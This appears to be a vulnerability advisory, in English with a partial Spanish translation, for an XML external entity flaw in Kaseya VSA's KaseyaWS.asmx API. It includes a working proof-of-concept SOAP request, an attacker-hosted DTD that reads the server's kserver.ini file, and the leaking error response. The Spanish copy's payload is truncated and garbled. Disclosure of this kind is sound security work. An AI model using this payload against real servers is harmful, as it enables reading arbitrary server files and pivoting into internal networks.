The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r
\r
System.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
La API /vsaWS/KaseyaWS.asmx puede utilizarse para enviar XML al sistema. Cuando este XML es procesado (externo) las entidades son procesadas y obtenidas de forma insegura por el sistema y devueltas al atacante. Descripción detallada Dada la siguiente petición: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob. dtd"><data>&send;</data> ``` Y el siguiente archivo XML alojado en http://192.168.1.170/oob.dtd: ``` "> %eval; %error; ``` El servidor obtendrá este archivo XML y lo procesará, leerá el archivo c:\kaseya\kserver\kserver.ini y devolverá el contenido en la respuesta del servidor como se indica a continuación. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 soap:ServerEl servidor no pudo procesar la solicitud. ---Hay un error en el documento XML (24, -1000): Identificador de fragmento '######################################################################## # Este es el archivo de configuración para el KServer. # Colóquelo en el mismo directorio que el ejecutable del KServer # Una línea en blanco o una nueva cabecera de sección válida [] termina cada sección. # Las líneas de comentario comienzan con ; o # ######################################################################## ``` Problemas de seguridad descubiertos --- * La API resuelve de forma insegura entidades XML externas * La API tiene una respuesta de error demasiado verbosa Impacto --- Usando esta vulnerabilidad un atacante puede leer cualquier archivo en el servidor que el proceso del servidor web pueda leer. Además, puede ser utilizado para realizar solicitudes HTTP(s) en la red local y así utilizar el sistema Kaseya para pivotar en la red local
